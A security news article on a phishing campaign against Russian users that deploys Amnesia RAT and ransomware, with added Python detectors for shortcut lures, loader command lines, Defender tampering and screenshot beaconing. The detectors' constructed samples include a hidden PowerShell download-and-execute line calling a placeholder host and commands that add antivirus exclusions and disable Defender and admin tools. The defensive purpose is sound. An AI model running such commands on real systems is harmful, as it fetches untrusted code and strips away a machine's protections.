Security researchers have uncovered a multi-stage phishing campaign targeting users in Russia. The attackers deliver ransomware together with a remote access trojan known as Amnesia RAT.
How the Attack Begins
The phishing emails carry attachments disguised as routine business documents, such as work assignments or reports, so victims open them without a second thought.
The attachments are compressed archives holding several decoy documents in Russian alongside a Windows shortcut (.lnk) file with a double extension. Because Explorer never displays the .lnk extension, even when extensions for known file types are shown, the shortcut appears to be an ordinary text file.
First Stage Loader Activates
Opening the shortcut runs a PowerShell command that downloads the next-stage script from a public code-sharing site. The script immediately hides its console window and writes a decoy text file to keep the user occupied.
It then opens that decoy document, reports the successful infection to the attacker through a messaging bot, and sleeps for several minutes before continuing, a delay that also helps it outlast short automated sandbox runs.
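Two things an analyst can check for this first stage are the archive itself (a shortcut hiding behind a document extension) and the PowerShell command line the shortcut launches (hidden window, download, in-memory execution, long sleep). The script below is an added example written for this article, not code from the researchers' report; the archive contents, the command lines and the "paste.example" host watchlist are constructed for illustration and stand in for the real lure and code-sharing site, which the article does not name.

```python
from __future__ import annotations

import io
import os
import re
import zipfile

# ---- 1. Archive triage ------------------------------------------------------
# Explorer never displays the .lnk extension, so a member named
# "Список_задач.txt.lnk" is shown as "Список_задач.txt" and passes for text.

def build_sample_archive() -> bytes:
    """Constructed sample for this example: Russian decoys plus one double-extension shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Отчёт_за_квартал.docx", b"decoy")
        z.writestr("Задание_на_неделю.pdf", b"decoy")
        z.writestr("Список_задач.txt.lnk", b"L\x00\x00\x00")  # stand-in bytes, not a real .lnk
    return buf.getvalue()


def shortcut_members(archive_bytes: bytes) -> list[tuple[str, str | None]]:
    """List every .lnk in the archive with the document extension it hides behind (or None)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as z:
        for name in z.namelist():
            base = os.path.basename(name).lower()
            if base.endswith(".lnk"):
                inner_ext = os.path.splitext(base[:-4])[1]  # ".txt" for "x.txt.lnk", "" for "x.lnk"
                found.append((name, inner_ext or None))
    return found


# ---- 2. PowerShell command-line triage --------------------------------------
# Hallmarks of the first-stage loader: hidden window, download from a remote
# host, execution straight from memory, and a long sleep before stage two.
LOADER_MARKERS = [
    ("hidden_window",   re.compile(r"-w[a-z]*\s+hidden", re.I)),
    ("remote_download", re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)),
    ("in_memory_exec",  re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("long_sleep",      re.compile(r"start-sleep\s+(?:-s(?:econds)?\s+)?(\d+)", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I)),
]

# Assumed watchlist of code-sharing / paste hosts; fill it from your own intel.
# "paste.example" is a placeholder that only the constructed sample below uses.
CODE_SHARING_HOSTS = {"paste.example"}
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

# Constructed command lines: one mirroring the chain described above, one benign.
SAMPLE_CMDLINE = ('powershell.exe -w hidden -c "iex (iwr https://paste.example/raw/loader).Content; '
                  'Start-Sleep -Seconds 300"')
BENIGN_CMDLINE = r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"


def triage_powershell(cmdline: str) -> dict:
    """Map each loader marker found in the command line to its evidence."""
    findings: dict = {}
    for name, pattern in LOADER_MARKERS:
        m = pattern.search(cmdline)
        if m:
            findings[name] = int(m.group(1)) if m.groups() else True  # sleep seconds, else True
    watched = [h.lower() for h in URL_HOST_RE.findall(cmdline) if h.lower() in CODE_SHARING_HOSTS]
    if watched:
        findings["code_sharing_host"] = watched
    return findings


def is_stage_one_loader(cmdline: str) -> bool:
    """Verdict: the three core markers together, or any three markers, marks a loader."""
    f = triage_powershell(cmdline)
    return {"hidden_window", "remote_download", "in_memory_exec"}.issubset(f) or len(f) >= 3


if __name__ == "__main__":
    print("shortcut members:", shortcut_members(build_sample_archive()))
    print("loader markers:", triage_powershell(SAMPLE_CMDLINE))
    print("verdict:", is_stage_one_loader(SAMPLE_CMDLINE))
```

In practice any .lnk arriving inside an emailed archive deserves a look, double extension or not; the function reports both so the single-extension case is not silently dropped. The command-line patterns cover the common PowerShell aliases (`iwr`, `irm`, `iex`) and parameter prefixes, but an attacker can always rephrase, so treat them as a triage aid rather than a complete signature.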
Second Stage Takes Control
After the delay, the loader executes an obfuscated script that assembles the next payload entirely in memory, leaving no obvious artifacts on disk. It then checks whether it is running with administrator rights.
If not, it keeps requesting elevation, throwing up User Account Control (UAC) prompt after prompt until the victim clicks Yes just to make them stop. That click hands the malware elevated privileges for everything that follows.
Disabling Defenses Step by Step
With elevated rights, the malware adds antivirus exclusions for folders such as Downloads and Desktop, so anything dropped there is never scanned, and switches off additional protection features. It then uses a helper tool to register a bogus antivirus product with Windows.
Because Windows assumes a registered third-party product is now protecting the system, the built-in defense stands down. The malware also disables administrative tools through registry policy changes.
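Every action in these two steps leaves telemetry: the exclusion and feature changes show up in PowerShell script block logs (Event ID 4104), the registry policy writes in Sysmon registry events (Event ID 13), and the bogus product in the Windows Security Center inventory. The detector below is an added example, not code from the article or the researchers; the event lines are constructed, the registry value names and the approved-product list are assumptions (the article does not say which tools were disabled), and "Example Antivirus" is a placeholder for the rogue registration.

```python
import re

# Constructed sample telemetry (not logs from the campaign). Each row is
# (source, text): "4104" = PowerShell script block text, "13" = a Sysmon
# registry value-set event rendered as "key\value = data".
SAMPLE_EVENTS = [
    ("4104", r'Add-MpPreference -ExclusionPath "$env:USERPROFILE\Downloads","$env:USERPROFILE\Desktop"'),
    ("4104", r"Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true"),
    ("4104", r"Set-MpPreference -DisableScriptScanning $true"),
    ("13",   r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = 1"),
    ("13",   r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = 1"),
    ("13",   r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = 1"),
    ("4104", r"Get-ChildItem $env:USERPROFILE\Documents"),   # benign noise
]

# Assumed watchlist: the article says admin tools were disabled via the
# registry without naming them, so these are the usual policy values.
ADMIN_TOOL_POLICY_RE = re.compile(r"\\Policies\\System\\(DisableTaskMgr|DisableRegistryTools)\s*=\s*1\b", re.I)
DEFENDER_POLICY_RE   = re.compile(r"\\Policies\\Microsoft\\Windows Defender\\(DisableAntiSpyware|DisableAntiVirus)\s*=\s*1\b", re.I)
# Argument of -ExclusionPath/-ExclusionProcess/-ExclusionExtension up to the next parameter.
EXCLUSION_ARG_RE     = re.compile(r"-Exclusion(Path|Process|Extension)\s+(.+?)(?=\s+-[A-Za-z]|$)", re.I)
# Any -Disable<Feature> $true (or 1) switch on a Set-MpPreference call.
DISABLE_FLAG_RE      = re.compile(r"-Disable(\w+)\s+(?:\$true|1)\b", re.I)


def detect_tampering(events):
    """Return (rule, detail) pairs for every defence-tampering action found in the events."""
    findings = []
    for _source, text in events:
        if re.search(r"\bAdd-MpPreference\b", text, re.I):
            for m in EXCLUSION_ARG_RE.finditer(text):
                findings.append((f"defender_exclusion_{m.group(1).lower()}", m.group(2)))
        if re.search(r"\bSet-MpPreference\b", text, re.I):
            for m in DISABLE_FLAG_RE.finditer(text):
                findings.append(("defender_feature_disabled", m.group(1)))
        for m in DEFENDER_POLICY_RE.finditer(text):
            findings.append(("defender_policy_disabled", m.group(1)))
        for m in ADMIN_TOOL_POLICY_RE.finditer(text):
            findings.append(("admin_tool_disabled", m.group(1)))
    return findings


# Assumed: the organisation's approved products as they appear in Security
# Center (root/SecurityCenter2, class AntiVirusProduct, property displayName).
APPROVED_AV_PRODUCTS = {"Windows Defender", "Microsoft Defender Antivirus"}
# Constructed inventory; the second entry models the rogue registration.
SAMPLE_WSC_PRODUCTS = ["Windows Defender", "Example Antivirus"]


def unexpected_av_products(registered):
    """Names registered with Security Center that are not on the approved list."""
    return [p for p in registered if p not in APPROVED_AV_PRODUCTS]


if __name__ == "__main__":
    for rule, detail in detect_tampering(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
    print("unexpected AV registrations:", unexpected_av_products(SAMPLE_WSC_PRODUCTS))
```

On a live host the same state can be pulled with `Get-MpPreference` (exclusion lists and the `Disable*` settings), `Get-MpComputerStatus` (whether tamper protection is on) and `Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct` for the registered products. With tamper protection enabled the `Add-MpPreference` and `Set-MpPreference` lines above fail, which is exactly why the Prevention Strategies section leads with it.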
Spying and Gathering Data
The malware then downloads a dedicated surveillance module that captures a screenshot every 30 seconds, saves it as an image file, and exfiltrates it through the same kind of messaging bot.
It later harvests data from browsers, cryptocurrency wallets, chat applications, and games, and collects webcam photos, audio recordings, clipboard contents, and active window titles, giving the attackers a detailed picture of the victim's activity.
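A screenshot loop on a fixed 30-second timer produces something ordinary software rarely does: outbound connections from one process to one host at almost perfectly regular intervals, each carrying an image-sized upload. The detector below, an added example rather than code from the article, flags that cadence from a connection log. The log is constructed, and "bot-api.example" is a placeholder for whichever messaging-bot API the implant talks to, which the article does not name; the same logic catches the stage-one check-in if it repeats.

```python
from collections import defaultdict

# Constructed connection log, not a real capture: (seconds since start, process,
# destination host, bytes sent). The 30-second cadence and ~180 KB uploads model
# the screenshot channel described above.
_BEACON_TIMES = [0, 31, 60, 92, 120, 151, 180, 211, 240, 270, 301, 330]
SAMPLE_CONNECTIONS = [
    (t, "powershell.exe", "bot-api.example", 180_000 + (i * 7919) % 20_000)
    for i, t in enumerate(_BEACON_TIMES)
] + [
    (t, "chrome.exe", "cdn.example", 4_000)           # ordinary browsing: bursty, irregular
    for t in (5, 17, 140, 143, 390, 391, 402, 560)
]


def find_beacons(connections, min_events=8, max_cv=0.10):
    """Flag (process, host) pairs whose connection intervals are too regular to be human.

    cv = standard deviation / mean of the inter-connection gaps; a loop on a fixed
    timer stays near 0, while browsing scatters well above 0.1.
    """
    by_key = defaultdict(list)
    for ts, proc, host, nbytes in connections:
        by_key[(proc, host)].append((ts, nbytes))

    hits = {}
    for key, rows in by_key.items():
        if len(rows) < min_events:
            continue                                  # too few samples to judge cadence
        rows.sort()
        times = [ts for ts, _ in rows]
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean_gap = sum(gaps) / len(gaps)
        if mean_gap == 0:
            continue
        sd = (sum((g - mean_gap) ** 2 for g in gaps) / len(gaps)) ** 0.5
        cv = sd / mean_gap
        if cv <= max_cv:
            hits[key] = {
                "count": len(rows),
                "mean_interval": mean_gap,
                "cv": round(cv, 3),
                "avg_bytes": sum(n for _, n in rows) // len(rows),
            }
    return hits


if __name__ == "__main__":
    for (proc, host), info in find_beacons(SAMPLE_CONNECTIONS).items():
        print(f"{proc} -> {host}: every {info['mean_interval']:.0f}s, "
              f"{info['count']} hits, ~{info['avg_bytes']} bytes each (cv={info['cv']})")
```

The timer in the sample drifts by a second or two, as real implants do, and the coefficient of variation still comes out around 0.04. Legitimate software with fixed polling (update checkers, chat clients) will also score low, so the process name and the upload size are what separate a screenshot exfiltration loop from benign keep-alives.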
Delivering the Main Payloads
One payload fetches Amnesia RAT from a file-sharing site. The RAT gives the attackers full remote control: they can run commands, terminate processes, and install additional malware. Stolen data leaves the machine over secure channels or through file-hosting services.
A second payload launches ransomware from a known family. It first terminates processes that could interfere, for example by holding target files open, then encrypts documents, photos, source code, and other valuable files. It also replaces cryptocurrency wallet addresses found in the clipboard with attacker-controlled ones.
Final Lock and Broader Trends
Finally, a screen locker blocks normal use of the machine and displays instructions to contact the attacker. Other campaigns are hitting Russian companies as well, some using fake bonus documents or AI-generated lures.
Some of them deliver concealed implants that load command-and-control frameworks; others use application add-in files to plant backdoors. Together they point to a growing focus on Russian targets.
Prevention Strategies
Organizations and users can cut this risk with a few strong controls. Enable tamper protection on endpoint security software so that exclusions and protection features cannot be changed by a script, even one running with administrator rights. Scan suspicious archives before opening them, and treat shortcut (.lnk) files arriving inside archives as hostile.
Continuous monitoring of PowerShell activity (script block logging and process command lines) catches the loader early and flags new antivirus exclusions or disabled admin tools the moment they appear. Regular training helps employees recognize fake business lures. Together these measures limit the damage from multi-stage phishing and stop the ransomware before it spreads.

